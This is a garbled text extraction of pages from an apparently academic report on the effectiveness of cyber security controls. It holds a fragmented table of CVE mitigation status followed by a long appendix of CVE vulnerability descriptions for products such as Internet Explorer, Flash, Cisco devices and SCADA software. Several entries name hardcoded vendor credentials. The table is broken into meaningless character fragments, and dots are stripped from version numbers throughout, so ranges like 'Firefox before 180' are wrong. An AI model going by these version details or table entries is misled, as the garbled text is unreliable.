14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
